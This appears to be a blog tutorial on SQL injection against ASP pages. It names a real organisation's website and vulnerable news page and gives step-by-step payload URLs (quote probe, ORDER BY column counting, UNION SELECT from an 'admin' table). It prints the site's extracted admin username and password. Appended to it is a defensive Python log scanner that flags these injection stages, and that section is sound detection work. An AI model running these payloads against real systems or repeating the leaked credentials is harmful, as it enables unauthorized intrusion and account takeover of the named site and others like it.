MSSQL(asp) injection
So let's start. I got this one:
http://www.fpcci.com.pk
Here is the vulnerable page of the site:
http://www.fpcci.com.pk/news1/display_newsDetail.asp?newsid=985
We can check for the vulnerability by using the ' sign, as in simple SQL injection.
If the site is vulnerable we will get an error like this:
Quote
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'ct.cattypeid=nc.cattypeid AND nc.catid=n.catid AND n.newsid=985';'.
/news1/includes/common.asp, line 75
OK, now we got the error, which means the site is vulnerable. Let's move to the next point: we need to find the number of columns. To get it we do the same as in simple SQL injection, but here we use # instead of -- at the end of our query.
So now our URL will look like:
http://www.fpcci.com.pk/news1/display_newsDetail.asp?newsid=985 order by 1#
Keep trying this order by command until we get an error like:
Quote
Microsoft JET Database Engine error '80040e14'
The Microsoft Jet database engine does not recognize '16' as a valid field name or expression.
/news1/includes/common.asp, line 75
I got the error on 16, which means the site has 15 columns. Voila.
In the next step we need the name of a table to get the numbers of the visible columns. Let me explain a bit: in simple SQL injection we use union select 1,2,3,4,5,6 -- and get a number that we use to pull information from the site; here we need a table name to get that visible column number.
So to get that number we add the name of the table after union select 1,2,3,4,5,6,7,8,9, ......,15
For this type of injection the scripts for getting table names don't work most of the time (I tried some of them), so we add table names manually. Common table names are "admin, tbladmin, tbl_admin, user, users, login, info, email" etc. On my site the table name was admin, so I am going to use it. Now our URL will look like:
http://www.fpcci.com.pk/news1/display_newsDetail.asp?newsid=985 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from admin#
After this we get the numbers of the visible columns, which we can use to get data from the site. Here I got 3, 7 and 6.
We are going to use 3 to get information: all we have to do is put the name of a column in place of 3 in the string, and we will get the username and password.
Now our URL will look like:
http://www.fpcci.com.pk/news1/display_newsDetail.asp?newsid=985%20union%20select%201,2,name,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin#
And done, we got the username here.
The username is
farrukh
and then change the column name to the password's column name:
http://www.fpcci.com.pk/news1/display_newsDetail.asp?newsid=985%20union%20select%201,2,password,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin#
You will get the password ;) Here we got the password, which is
fpcci#f
Hope it helps you. For this type of injection there aren't many working scripts to get tables etc.; if I get working ones I will update this tut soon ... by me for CT, enjoy !!
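Seen from the defender's side, every step above leaves a recognisable value in the newsid parameter of the web server log. The following is an added example, not part of the original post: it scans IIS-style W3C log lines for a newsid value that is not a plain integer and labels which step it resembles. The log lines, field layout, client addresses and stage names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS-style W3C log lines (not real traffic; documentation IP ranges).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2024-01-10 09:00:01 198.51.100.7 GET /news1/display_newsDetail.asp newsid=985 200
2024-01-10 09:02:11 203.0.113.9 GET /news1/display_newsDetail.asp newsid=985' 500
2024-01-10 09:02:40 203.0.113.9 GET /news1/display_newsDetail.asp newsid=985%20order%20by%2016 500
2024-01-10 09:03:05 203.0.113.9 GET /news1/display_newsDetail.asp newsid=985+union+select+1,2,3+from+admin 200
"""

# Stage labels are this example's own names; most specific pattern first.
STAGES = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("order-by-count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("quote-probe", re.compile(r"['\"]")),
]

def classify(value):
    """Return None for a plain integer id, else the stage the value resembles."""
    if re.fullmatch(r"[0-9]{1,10}", value):
        return None
    for name, pattern in STAGES:
        if pattern.search(value):
            return name
    return "non-numeric"

def scan(log_text, param="newsid"):
    """Return (client_ip, status, stage) for each request with a non-integer param."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column names come from the log header
            continue
        if not line or line.startswith("#"):
            continue
        row = dict(zip(fields, line.split(" ")))
        # parse_qs URL-decodes, so %20 and + both become spaces before matching
        query = parse_qs(row.get("cs-uri-query", ""), keep_blank_values=True)
        for value in query.get(param, []):
            stage = classify(value.strip())
            if stage:
                hits.append((row["c-ip"], int(row["sc-status"]), stage))
    return hits

if __name__ == "__main__":
    for ip, status, stage in scan(SAMPLE_LOG):
        print(f"{ip} status={status} stage={stage}")
```

The same integer-only test, applied in the page before the value reaches the query, means a newsid that is not all digits is never concatenated into SQL.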
Copyrights: Please stop stealing content from our site, i.e. xedlgubaid.blogspot.com. I am working hard to create an article, and you are simply copying? Please respect our hard work. At least place a backlink to our site and give credit to our blog/author. Hope you will understand our feelings.